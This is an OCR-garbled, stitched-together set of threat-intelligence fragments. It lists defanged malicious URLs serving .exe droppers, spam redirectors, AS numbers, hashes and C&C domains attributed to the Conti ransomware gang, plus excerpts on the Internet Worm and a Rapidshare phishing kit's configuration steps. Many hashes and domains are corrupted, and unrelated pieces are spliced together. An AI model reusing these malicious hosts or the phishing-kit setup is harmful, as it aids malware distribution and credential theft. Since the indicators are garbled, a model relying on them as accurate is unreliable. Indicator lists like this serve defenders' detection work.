hxxp://slamabal[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=80fc2ce2824cf0501dc309- 
cle9e98358 


hxxp://slamabal[.]Jecolink24[.]ru/goinf _plugin[.]exe?etag=af6f85b3438a1147113ef2- 
789c561f29 


hxxp://slg[.]goldenshopone[.]from-ca[.]com/ 


hxxp://smartresearchers[. ]copy-max[.]com/article/2018512/buy-essay-onli ne-cheap-role-of- 
religion-in-europe/ 


hxxp://sme[.]smartwritingservice[.]4pu[.]com/essay/1/paper/19/ 
hxxp://smtp[.]cpven[.]com/ 

hxxp://smtp[.]cpven[.]com/ 
hxxp://sns[.]gongye360[.]com/link[.]php?url=hxxp://bal[.]Jma mashoping[.]cloudns[.]cx/ 


hxxp://soft[.]dfservice[.]com/cgi-bin/top/out[.]cgi?ses=TW4xyijNwh &id=4 
&url=hxxp://oxz[. Jauctions2018[.]homelinux[.]net/ 


hxxp://softkachaem[.]ru/katalog/click[.]php?url=hxxp://nuh[.Jauct ions2018[- 
.]Jhomelinux[.Jcom/ 


hxxp://softkachaem[.]ru/katalog/click[.]php?url=hxxp://wei[.]auc tions2018[.]cloudns[.]cx/ 
hxxp://someone[.]loveessay|[.]dnsalias[.]com/topic/10/essa y/53 


hxxp://space[.]yhtzx[.]net/link[.]php?url=hxxp://akh[.]mamash oping[.]cloudns[.- 
]cx/sitemap[.]txt 


hxxp://spb-adIr[.]ru/redirect[.]php?link=hxxp://vsq[.]goldenshopo ne[.]from-ca[.]com 
hxxp://spz[.]Jauctions2000[.]cloudns[.]cx/sitemap2[.]html 
hxxp://ssh[.]smythstoys[.]authorizeddns[.]us/ 


hxxp://stablishmentaria[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=fe84b8f466db0082bed1158 
34bb6a8 


hxxp://stage[. ]}www[.]winnipegfreepress[.]com/s?action=editReg &rurl=hxxp://rdh[.]goldenshopone|[ 
ca[.]com/ 


hxxp://standartmedial[.]ru/go[.]php?url=hxxp://sgu[.]goldenshopone [.]from-ca[.]com 
hxxp://su[.]monitorlatino[.]com/myphoneno812434 


hxxp://suicide[.]shopmarket[.]from-ca[.]Jcom/review/20171112/solar §-powered-led-security- 
motion-detector-outdoor-light[.]htm 


hxxp://super[. }fantn[.]cc/ 

hxxp://superior[. ]}writeessaytome[.]cloudns[.]cx/topic/201782/41 7/ 

hxxp://supershopping[.]publicvm[.]com/ 

hxxp://support[.]sinewave[.]space/ 

hxxp://svk[. Jauctions2018[.]homelinux[.]com/ 

hxxp://swf[.]kladtv[.]com/ 

hxxp://swh[.]smartwritingservice[.]4pu[.]com/article/1/paper/35 / 

hxxp://szkoly[.]szczecin[.]pl/redirect[.]php?url=hxxp://odd[ .Jauctions2018[.]dnsalias[.]net/ 
19853 


hxxp://t7djau[.]findhere[. Jorg/ 
hxxp://ta2[.]pl/mynotnorthdakota1870 
hxxp://tbd[.]kladtv[.]com/ 


hxxp://technewstube[.]com/go/?url=hxxp://amp[.]mamashoping[.]clou dns[.]cx/ 


hxxp://templates[.]ball-layouts[.]com 


hxxp://templates[.]ball-layouts[.]com 


hxxp://tfx[.]goldenshopone[.]from-ca[.]com/ 


hxxp://thabasca[.]eco-link-shop[. ]ru/ 


hxxp://thabasca[.]eco-link-shop[.]ru/2inf autorun[.Jexe 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
a121c90102b 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
e09af522614c5 


hxxp://thabasca[. ]eco-link-shop[. ]ru/2inf 
11a669e04d17d 


hxxp://thabasca[. ]eco-link-shop[. ]ru/2inf 
522614c5 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
121c90102b 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
af522614c5 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
669e04d17d 


hxxp://thabasca[.]eco-link-shop[. ]ru/2inf 
7e09af522614c5 


_autorun[.]exe?etag=3be94a4d75a0f63a9a652- 
_favorites[.]exe?etag=6a42c211694e69728b/7- 
_favorites[.]exe?etag=a735laafd29c9b9e0c1- 
_icon[.]exe?etag=6a42c211694e69728b7e09af- 
_launch[.Jexe?etag=3be94a4d75a0f63a9a652a- 
_launch[.]exe?etag=6a42c211694e69728b7e09- 
_launch[.]exe?etag=a735laafd29c9b9e0c111a- 


_pinnedtabs[.]exe?etag=6a42c211694e69728b- 


hxxp://thabasca[.]eco-link-shop[.]ru/2inf speaddial[.]png 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
7277ab8790f 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
b18ba8e490a 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
45c053bf1a4 


hxxp://thabasca[. ]Jecolink24[. ]ru/2inf 
34069372593 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
cab6c5210c6 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
8bf88e000ca 


hxxp://thabasca[. ]ecolink24[.]ru/2inf 
f3650720c59 
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_autorun[.]exe?etag=1225d37e4bebf596340ba- 
_autorun[.]exe?etag=1b2d24bc621b86bc972e9- 
_autorun[.]exe?etag=2719d0ac60b8da20a4880- 
_autorun[.]exe?etag=5bcbbdedb29e47a4c6147- 

_autorun[.Jexe?etag=5c107a77c245c9daa6fOb- 
_autorun[.]exe?etag=5ee32b7d72e7032ea703d- 


_autorun[.]exe?etag=6768556baaf7e8c22248b- 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
4144fa2ce42 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
90285e5d4al 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
e75a61509e2 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
laed2fe8b23 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
31310f87b52 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
4eb86feOd1c 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
117da04b8d2 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
078fe6c858d 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
a4cb41e6ec0 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
ba7277ab8790f 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
e9b18ba8e490a 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
8045c053bf1a4 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
4734069372593 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
Obcab6c5210c6 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
8bf3650720c59 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
704144fa2ce42 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
2090285e5d4al 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
29e75a61509e2 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
43f87b21e86b8 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
aclaed2fe8b23 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
7f5510d2390c7 


_autorun[.]exe?etag=6f045dbe7f4081b013e70- 
_autorun[.]exe?etag=6f20a30aed8036ef93320- 
_autorun[.]Jexe?etag=8d2867aa1911f66331e29- 
_autorun[.]exe?etag=99fb808fe277168bb16ac- 
_autorun[.]Jexe?etag=cf9aafb56efd581aa55a4- 
_autorun[.Jexe?etag=d1c837ba1l1e0255de9cb3- 
_autorun[.]exe?etag=dad54a9c9961f7659ea75- 
_autorun[.]Jexe?etag=ec5b59d3cae/754164d0d0- 
_autorun[.]exe?etag=f5891071f4da2d8fc6970- 
_favorites[.]lexe?etag=1225d37e4bebf596340- 
_favorites[.]exe?etag=1b2d24bc621b86bc972- 
_favorites[.]exe?etag=2719d0ac60b8da20a48- 
_favorites[.]exe?etag=5bcbbdedb29e47a4c61- 
_favorites[.]Jexe?etag=5c107a77c245c9daa6f- 
_favorites[.]exe?etag=6768556baaf7e8c2224- 
_favorites[.]exe?etag=6f045dbe7f4081b013e- 
_favorites[.]exe?etag=6f20a30aed8036ef933- 
_favorites[.]lexe?etag=8d2867aa1911f66331e- 
_favorites[.]exe?etag=95680316bbaaf3f9420- 
_favorites[.]exe?etag=99fb808fe277168bb16- 
_favorites[.]exe?etag=aacb9ab46fba7774780- 


19855 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
a431310f87b52 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
75117da04b8d2 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
d0078fe6c858d 


hxxp://thabasca[. ]Jecolink24[. ]ru/2inf 
70a4cb41e6ec0 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
7ab8790F 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
ba8e490a 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
053bf1a4 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
69372593 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
6c5210c6 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
88e000ca 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
50720c59 


_favorites[.]exe?etag=cf9aafo5b6efd581aa55- 
_favorites[.]Jexe?etag=dad54a9c9961f7659ea- 
_favorites[.]exe?etag=ec5b59d3cae754164d0- 

_favorites[.]exe?etag=f5891071f4da2d8fc69- 

_icon[.]exe?etag=1225d37e4bebf596340ba727- 
_icon[.]exe?etag=1b2d24bc621b86bc972e9b18- 
_icon[.]exe?etag=2719d0ac60b8da20a488045c- 
_icon[.]exe?etag=5bcbbdedb29e47a4c6147340- 

_icon[. Jexe?etag=5c107a77c245c9daab6fObcab- 
_icon[.]exe?etag=5ee32b7d72e7032ea703d8bf- 


_icon[.]exe?etag=6768556baaf7e8c22248bf36- 


hxxp://thabasca[.]Jecolink24[.]ru/2inf _icon[.Jexe?etag=6f045dbe7f4081b013e704144fa2ce42 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
85e5d4al 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
a61509e2 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
b21e86b8 


_icon[.]exe?etag=6f20a30aed8036ef93320902- 
_icon[. Jexe?etag=8d2867aa1911f66331e29e75- 


_icon[.]exe?etag=95680316bbaaf3f942043f87- 


hxxp://thabasca[.]Jecolink24[.]ru/2inf _icon[.]Jexe?etag=99fb808fe277168bb16aclaed2fe8b23 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
0d2390c7 


_icon[.]exe?etag=aacb9ab46fba77747807f551- 


hxxp://thabasca[.]ecolink24[.]ru/2inf _icon[.]exe?etag=cf9aafo56efd581aa55a431310f87b52 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
86feOd1c 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
da04b8d2 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
fe6c858d 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
277ab8790f 
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_icon[. ]Jexe?etag=d1c837bal1e0255de9cb34eb- 
_icon[. ]exe?etag=dad54a9c9961f7659ea75117- 
_icon[. ]exe?etag=ec5b59d3cae754164d0d0078- 


_launch[.]exe?etag=1225d37e4bebf596340ba7- 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
18ba8e490a 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
5c053bf1la4 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
ab6c5210c6 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
3650720c59 


hxxp://thabasca[.Jecolink24[.]ru/2inf 
144fa2ce42 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
0285e5d4al 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
75a61509e2 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
87b21e86b8 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
aed2fe8b23 


hxxp://thabasca[.Jecolink24[.]ru/2inf 
510d2390c7 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
1310f87b52 


hxxp://thabasca[.Jecolink24[.]ru/2inf 
4cb41le6ec0 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
O03d8bf88e000ca 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
e704144fa2ce42 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
043f87b21e86b8 


hxxp://thabasca[.Jecolink24[.]ru/2inf 
5a431310f87b52 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
0d0078fe6c858d 


_launch[.Jexe?etag=1b2d24bc621b86bc972e9b- 
_launch[.Jexe?etag=2719d0ac60b8da20a48804- 
_launch[.Jexe?etag=5c107a77c245c9daa6f0bc- 
_launch[.Jexe?etag=6768556baaf7e8c22248bf- 
_launch[.Jexe?etag=6f045dbe7f4081b013e704- 
_launch[.Jexe?etag=6f20a30aed8036ef933209- 
_launch[.Jexe?etag=8d2867aa1911f66331e29e- 
_launch[.]Jexe?etag=95680316bbaaf3f942043f- 
_launch[.Jexe?etag=99fb808fe277168bb16ac1- 
_launch[.Jexe?etag=aacb9ab46fba77747807f5- 
_launch[.Jexe?etag=cf9aafb56efd581aa55a43- 
_launch[.Jexe?etag=f5891071f4da2d8fc6970a- 
_pinnedtabs[.]lexe?etag=5ee32b7d72e7032ea7- 
_pinnedtabs[.]lexe?etag=6f045dbe7f4081b013- 
_pinnedtabs[.]exe?etag=95680316bbaaf3f942- 
_pinnedtabs[. ]exe?etag=cf9aafb56efd581aa5- 


_pinnedtabs[.]lexe?etag=ec5b59d3cae754164d- 


hxxp://thabasca[.]ecolink24[.]Jru/2inf shortcutmaker [.]ico 


hxxp://thabasca[.Jecolink24[.]Jru/2inf speaddiall.]png 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
3d8bf88e000ca 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
704144fa2ce42 


hxxp://thabasca[.]Jecolink24[.]ru/2inf 
2090285e5d4al 


_speeddiall[.]exe?etag=5ee32b7d72e7032ea70- 
_speeddiall.Jexe?etag=6f045dbe7f4081b013e- 
_speeddiall.]exe?etag=6f20a30aed8036ef933- 


19857 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
43f87b21e86b8 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
aclaed2fe8b23 


hxxp://thabasca[. ]ecolink24[. ]ru/2inf 
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Happy 20th birthday, internet worm! 
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This weekend marks the 20th anniversary of the Internet Worm, the first 
major worm that propagated on the Internet. Even though many years 
have passed and underlying meda has changed, worms are stl able to 
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previous summaries for [2]September, [3]August and [4]July, as well as subscribe to my 
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Notable articles for October - [7]Scammers introduce ATM skimmers with built-in SMS 
notification; [8]Inside an affiliate soam program for pharmaceuticals; [9]CardCops: Stolen 
credit card details getting cheaper. 
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10. [19]Inside an affiliate soam program for pharmaceuticals 

11. [20]Google to introduce warnings for potentially hackable sites 

12. [21]Lack of phishing attacks data sharing puts $300M at stake annually 
13. [22]CardCops: Stolen credit card details getting cheaper 
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Related ASs known to have been used by the Conti ransomware gang’s Internet connected 
infrastructure include: 
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AS61272 
AS39378 
AS3320 
AS213354 
AS49505 
AS35913 
AS30475 
AS46664 
AS45905 
AS33911 
AS61046 
AS7922 
AS4134 
AS21100 
AS30036 
AS209 
AS49981 
AS9829 
AS22773 
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AS16509 
AS15169 
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RAPIDSHARE. 


Home 


: Control. Panel 

fiew Accounts 
Delete Accounts Welcome to your Rapidshare 
Create Link 


Here you can access various features including your 
list of accounts and create your own links by 
following the link on the left. 


if you have any suggestions please contact 


The day when DIY phishing pages start coming with manuals is the day when consciously or 
subconsciously a phisher is lowering down the entry barriers into phishing for yet another 
time. A much more user-friendly compared to the old-fashioned - yet effective - [1]rock phish 
directory listing, a recently released command and control interface for Rapidshare phishing 
campaigns aims to empower its users with easy dynamic link generation for their campaigns. 


Configuring 


Open file “conf.inc.php" and edit at lines 2, 3 and 4 


$file = "TEXT-FILE.txt"; // rename *.txt 
Slogon = /ipass to read logs 


Sreset = // clears logs list 


At line 2 change “TEXT-FILE. txt" to something like “D2K46CRSGE9Q5F txt” 


DO NOT CHANGE *.TXT TO *.HTML OR SIMILAR FORMATS OR YOU MAY BE VULNERABLE TO JS EXPLOITS! 
At line 3 change at this line will be your pass to read the log file. 


At line 4 change at this line will be your pass to reset the log file. 
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AS62068 
AS204490 
AS54290 
AS55154 
AS12271 
AS50340 
AS11427 
AS31400 
AS36352 
AS52000 
AS16276 
AS39020 
AS56630 
AS201106 
AS24940 
AS56694 
AS19624 
AS12722 
AS62240 
AS50955 
AS50979 
AS34224 
AS8075 
AS9009 
AS10439 
AS7155 
AS213373 
AS64236 
AS10796 
AS60117 
AS36935 
AS59729 
AS701 
AS399629 


AS6128 
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AS35048 

AS51852 

AS60404 

AS14061 

AS174 

AS58329 

AS577 

AS20473 

AS11556 

AS46261 

Related Conti ransomware gang MD5s known to have been involved in the campaign: 
c5736bfalle7decaf5f7fe050b64d8cfd04bb80ec6f238512009ffcbb48856ca 
d030d878c51273d2ca64ce8b4b75f24cdb64b085febd8el5ea766df3e6feb3db 
00505315d1c6a3fb48dc7b2befb426e5d5c194073088754cd041268d5384b4al 
5aacb74b563f8e7ce7f8fac08416fc11e636f334c1c603981c2bf1a5c692d38b 
43ed009e83378c0b24d0b71ef479efbb5da7a074fe7d38916f0caa6e0a34cd84 
4d36106df69095ef5bd325e3e7857fe9004eb1d4cdfaeNad9d7845fefle7e981 
b3cd6afdfe41cba0274c7f8eeeb1bb2144ece26796f6c968893130a6599a09a2 
34fced20fd7d43fb4c8216e0bae2b55b441 9f6d68fe4f5248eb4fal96d1d9e50 
d0e8423c380elee16d67d3d29e9ad24ae940b755a5fc5d262f96bfO1lelcda54c 
8fbe54badf90alfod88de83b3e56baa92a8610a82fc74ff11631la2dece5b19a0 
9283842b577652ea6a99fa4991ab1f2b9973d2f8d10f9f63cf2ecbdb92f37a0b 
66be8d0ff5733c4a61b6e3f7dd72c0d47c5bb91a3c935b8e23f44d349b83a65b 
34864e8a46ae6a81159dc6b603e016b806c913675dcee9589092ee606671e4c7 
cb14cfdelal3ff2af4e59b91led9dca3bb0e024dd24cd671271fe98da8dd16b48 
133fe38f0f690300a7327a264585c289f83a37c2050f68f0af12c21d61ba6d63 
55465296b370c17961a82574ab8d98752657cbb3af20c0ad47802d12de50b519 
051e659236887414af9298c49d8c56c4a7e015599d2671768fc92904a78aaf8e 
7dd6bd5e242a710c1ebc3122298c62adb46574960d147af588d9b37e204bebb3 
3b186ac50c5dcd366e3a553ba2aab6d945b2478a0d1018149274419246f94acf 
514d739ef92e844a370bc555e0f56381f1301992908aab936038a7a7b65f2472 
08d77b7d2d7842c47645d97f252bb2d4ea6f76e94b53a4a092fef97ae4343858 
f556f38690b8b551ec8215bc38d2d1fc02895acf9ff54f9fal40ae568d296dfe 
619461c713124e503137bd2f6db01920ef71354d323073f3b04b714fc35c5a8a 


6098f7a363c450b76fdle268ffb38c2e5ce4312e00b84959b27cd1753bca93ac 
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03abad346c58d3670d064e5f61595367ef393f0a70ee933c21ad8b45fe37d84b 
ded87a28e363aab37f0el6df7aal5f5283dcec118eae798ca3a971672dfa27f9 
Odf514bcd1220062d70f1697 2cffOf79a0d94992c71376213992e4ded95285b3 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


03456[.]net 
148bd4fal[.]micro1[.]Jinbox[.]Jland 
148bd4fal.]micro3[.]Jinbox[.]land 
16648[.]css[.]derp-cdn[.]com 
17486[.]ns1[.]baiduyun-update[. ]live 
17486[.]ns2[.]baiduyun-updatef[. ]live 
195-123-214-177[.]cprapid[.]com 
1ldcmailsend[. ]cf 
1sco-ssecrevrfy[.]com 
2194092094029101[.]hopto[. Jorg 
23849238498[. ]tk 
2393datasw2[.]xyz 
2849829148218492[.]ddns[.]net 
2858c4b2[.]microl1[.]inbox[.]Jland 
2858c4b2[.]micro2[.]inbox[.]Jland 
2858c4b2[.]micro3[.]inbox[.]Jland 
294012985932598981[.]ddns[.]net 
2vpn[.]net 
44093[.]ns1[.]baiduyun-update[. ]live 
44093[.]ns2[.]baiduyun-updatef[. ]live 
52dswl[.]club 
57263[.]g1[.]Jimgbox[.]site 
57263[.]g2[.]imgbox[.]site 
8g4abqr2n2j8fjdk[.]myfritz[.]net 
al3[.]vifes[.]bid 
aaa[.]zzkyasd[.]Jcom 
aal[.]mamashoping[.]cloudns[.]cx 
aasfhhvyyayssal[.]xyz 
abe[.]mamashoping[.]cloudns[.]cx 
abw[.]mamashoping[.]cloudns[.]cx 
acchanalia[.]Jecolink24[.]ru 
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acchionial[.]ecolink24[.]ru 
account-updata[.]amazno[.]buzz 
accounts[.]auto[.]sc[.Jout24[.]handler98571[.]han395[. ]xyz 
accounts[.]auto[.]sc[.Jout[.]s24[.]handler69037[.]p ri082[.]xyz 
accounts[.]auto[.]sco[.]ut24[.]handler89301[.]ssl-309[. ]xyz 
accounts[.]Jautosc[.Jout24[.]handler38914[. ]Jusr720[.]xyz 
accounts[.]Jautosc[.Jout24[.]handler84703[.]mod61[.]xyz 
accounts[.]login[.]verified-link[.]com 

accountsauto[. ]scout24[.]handler26801[.]sec093[.]xyz 
acedonia[.]Jecolink24[.]ru 

acrorhampho[.]Jecolink24[.]ru 

addingto[.]Jecolink24[.]ru 
adi[.]Jmamashoping[.]cloudns[.]cx 

admin[.]iticket[.]md 

adminl[.]nticket[.]md 

administrator[. Jiticket[.]md 

adozhsko[.]ecolink24[.]ru 
adq[.]Jmamashoping[.]cloudns[.]cx 
aedalia[.Jecolink24[.]ru 
aej[.]mamashoping[.]cloudns[.]cx 
aem[.]mamashoping[.]cloudns[.]cx 
aesarea[.]Jecolink24[.]ru 
afn[.]mamashoping[.]cloudns[.]cx 
afo[.]Jmamashoping[.]cloudns[.]cx 
agatogo[.]ecolinkshop[.]ru 

agcopho[. Jecolink24[.]ru 

agellani[.]ecolink24[.]ru 

agersto[.Jecolink24[.Jru 

agersto[.]ecolinkshop[. ]ru 

agnapla[.]Jeco-link-shop[.]ru 

agnaplal[.Jecolink24[.]ru 

agneheli[.Jeco-link-shop[.]ru 

agneheli[.Jecolink24[.]ru 

agneheli[.Jecolinkshop[.]ru 

agnitogo[.]ecolink24[.]ru 
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agr[.]mamashoping[.]cloudns[.]cx 
aha[.]mamashoping[.]cloudns[.]cx 
aig[. ]mamashoping[.]cloudns[.]cx 
aim[.]mamashoping[.]cloudns[.]cx 
ainozoil[.Jecolink24[.]ru 
ainozoi[.]ecolinkshop[. ]ru 
aisleyi[.]eco-link-shop[.]ru 
aisleyi[.Jecolink24[.]ru 
aisleyi[.Jecolinkshop[. ]ru 
ajn[.]mamashoping[.]cloudns[. ]cx 
ajorana[.]Jecolink24[.]ru 
ajustes[. ]digital 
akersfi[.]ecolinkshop[.]ru 
akhachkala[.]eco-link-shop[. Jru 
akhachkalal[.]ecolink24[.]ru 
alaclaval[.Jecolink24[.]ru 
alamariacea[.]ecolink24[.]ru 
alaskagova[.]com 
alaysia[.Jecolink24[.Jru 
aleolithi[.Jecolink24[.]ru 
aleopsi[.]ecolink24[.]ru 
aleozoil.Jecolink24[.]ru 
alevala[.Jecolink24[.]ru 
aliburto[.Jecolink24[.Jru 
alimanta[.]eco-link-shop[. ]ru 
alimantal[.]Jecolink24[.]ru 
alliburto[.]ecolink24[.]ru 
alydonial[.]Jecolinkshop[. ]ru 
amazno[.]buzz 
amazon-oc[.]Jcam 
amazon-updata[.]buzz 
amazon-updata[.]co[. ]jp[.]Jc417ce26d4ce7a52a5fc2el195ic9o0boae7O0bcr e[.]buzz 
amelina[.Jeco-link-shop[.]ru 
amelina[.Jecolinkshop[.]ru 
amiltonia[.Jecolinkshop[.]ru 
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ampstea[.]eco-link-shop[.]ru 
anadizi[.Jecolinkshop[.]ru 
anamania[.]eco-link-shop[.]ru 
anamania[.]ecolinkshop[.]ru 
anarkshi[.]eco-link-shop[.]ru 
anarkshi[.]Jecolinkshop[. ]ru 
anberra[.]Jeco-link-shop[.]ru 
anberra[.]Jecolinkshop[.]ru 
andelbro[.Jeco-link-shop[.]ru 
andesbal[.]eco-link-shop[.]ru 
andesbal[.]Jecolinkshop[. ]ru 
android[.]I[.]google[.]Jcom 
andstei[.]ecolink24[.]ru 
anffshi[.]ecolinkshop[.]ru 
angladeshi[.]eco-link-shop[. Jru 
angladeshi[.]ecolinkshop[. ]ru 
anichaea[.]Jecolinkshop[. ]ru 
anoveria[.]ecolinkshop[.]ru 
ansardi[.]Jeco-link-shop[.]ru 
antuaria[.]eco-link-shop[.]ru 
antuaria[.]Jecolinkshop[.]ru 
api[.]Jcharmhub[.]io 
api[.]snapcraft[.]io 
aplacia[.]Jeco-link-shop[.]ru 
aplacia[.Jecolinkshop[. ]ru 
apoleoni[.]Jeco-link-shop[.]ru 
apoleoni[.Jecolinkshop[.]ru 
apsella[.Jecolinkshop[.]ru 
agqacidom[.]com 
araguaya[.]eco-link-shop[.]ru 
aralitho[.]ecolinkshop[.]ru 
aramanco[.]ecolinkshop[.]ru 
aramaribo[.]eco-link-shop[.]ru 
aramaribo[.]Jecolinkshop[.]ru 
araschino[.]eco-link-shop[. ]ru 
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araschino[.]ecolink24[.]ru 
araschino[.]Jecolinkshop[.]ru 
aratheodo[.]Jeco-link-shop[.]ru 
aratheodo[.]ecolink24[.]ru 
arbondal[.]eco-link-shop[.]ru 
arbonda[.]Jecolink24[.]ru 
ardiganshi[.]Jeco-link-shop[.]ru 
ardiganshi[.Jecolink24[.]ru 
aressala[.]eco-link-shop[.]ru 
aressala[.]ecolink24[.]ru 
argasia[.]ecolink24[.]ru 
arginatal[.]eco-link-shop[.]ru 
arginata[.]Jecolink24[.]ru 
arginatal[.]ecolinkshop[.]ru 
arietaria[.Jecolinkshop[.]ru 
arisimbi[.]eco-link-shop[.]ru 
arlovingia[.]Jecolink24[.]ru 
armagno[.]Jecolink24[.Jru 
armagno[.]Jecolinkshop[. ]Jru 
armecida[.]ecolink24[.]ru 


armonia[.]ecolink24[.]ru 


arnazon[.]co[.]jp[.]c417ce26d4ce7a52a5fc2el195ic9oboae70bcre[. ]buzz 


arnivora[.]Jecolink24[.]ru 
arolingia[.Jecolink24[.]ru 
arpathial[.Jecolink24[.Jru 
arrovia[.]ecolink24[.]ru 
arseillai[.]eco-link-shop[.]ru 
arseillai[.Jecolink24[.]ru 
arsupialia[.]ecolink24[.]ru 
arthanil[.]Jecolink24[.]ru 
artholi[.Jecolink24[.Jru 
artinmal[.]Jeco-link-shop[.]ru 
artinmal[.Jecolink24[.]ru 
arwinia[.]ecolink24[.]ru 


aryboro[.]Jecolink24[.]ru 
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aserwri[.]eco-link-shop[.]ru 
aserwril.Jecolink24[.]ru 
asfuuvhv3083f[.]xyz 
asgyyya6ychcha[.]xyz 
ashimoto[.]ecolink24[.]ru 
asoexample[. ]site 
assandra[.]Jecolinkshop[.]ru 
assertions[.]ubuntu[.Jcom 
assiopeia[.]Jecolink24[.]ru 
astillo[.]ecolink24[.]ru 
astleba[.]eco-link-shop[.]ru 
astleba[.Jecolink24[.]ru 
asypodidal[.]eco-link-shop[.]ru 
asypodida[.]Jecolink24[.]ru 
atagonial[.]Jecolinkshop[.]ru 
atarchea[.]ecolink24[.]ru 
ate-co-us[.]site 
ate-co-us[.]store 
atharina[.]eco-link-shop[.]ru 
atharinal[.Jecolink24[.]ru 
atholico[.]eco-link-shop[.]ru 
atholico[.Jecolink24[.]ru 
atholico[.]ecolinkshop[.]ru 
athraea[.]eco-link-shop[.]ru 
atricaria[.]eco-link-shopf[. ]ru 
atricaria[.]ecolink24[.]ru 
atsumoto[.]Jecolink24[.]ru 
atterso[.]eco-link-shop[.]ru 
atterso[.Jecolink24[.]ru 
atterso[.Jecolinkshop[. ]ru 
aurentia[.]eco-link-shop[.]ru 
aversia[.Jecolinkshop[. ]ru 
azarevi[.Jeco-link-shop[.]ru 
azarevil[.Jecolink24[.]ru 
azarevi[.Jecolinkshop[. ru 
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backup[.]fahmil[.]Jme 
baramanamc[.]com 
bartholaraka[.]com 
bbevillia[.Jecolinkshop[.]ru 
berdonial[.]ecolinkshop[.]ru 
bestcom[.]be 

bhuioeerO[. Jicefww[. ]top 
biekekyw[.]com 
bindolsmaoldmsozlas[. ]site 
bitavey[.]Jcom 


bitrixtemplates[.]com 


blankporinternt-registrointebk[. site 


blog[.]selfpharma[.]Jcom 
blogtodaynews[.]com 
brand339[.]Jcom 
browsergxopera[.]com 
browseroperagx[.]com 
bt[.]mucyacg[.]net 
busand[.]xyz 
byOts[.]net 


c417ce26d4ce7a52a5fc2el195ic9oboae70bcre[.]buzz 


Ccanada-service[.]com 
canalij[.]Jcom 
candabare[.]Jcom 
cardd[.]top 
carriermonitoring120[.]Jcom 
catransfer39933][.]live 
cdn-doubleclick[.]net 
cdn[.]byOts[.]net 
chantal[.Jcam 
cloudflare-proxy[.]com 
cms2020[.]e-consulta[.]com 
coinmap[.]dlinkddns[.]com 
coli1030921[.]ddns[.]net 


configwells-2yn[.]com 
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contestep[.]Jcom 
copy-max[.]com 
corporate[.]playinstall[.Jcom 
cvl[.]Jauctions2000[.]cloudns[.]cx 
czx[.]priceline[.]cloudns[.]cx 
d24[.]ru 

datacloudhub[. ]net 
dc2mailsender2[.]ml 
dc3mail3dcqmailer[.]gq 
dc4yourhost[.]gq 
dc5yourmail[.]Jgq 
dc6yourbestmailpractice[.]gq 
ddos[. ]biz 
delivery[.]selfoharma[.]Jcom 
demo[.]Jonionbazaar[.]org 
developer[.]space 
diavol-news[.]net 
dmondso[.]eco-link-shop[. ]ru 
dmondso[.]ecolinkshop[.]ru 
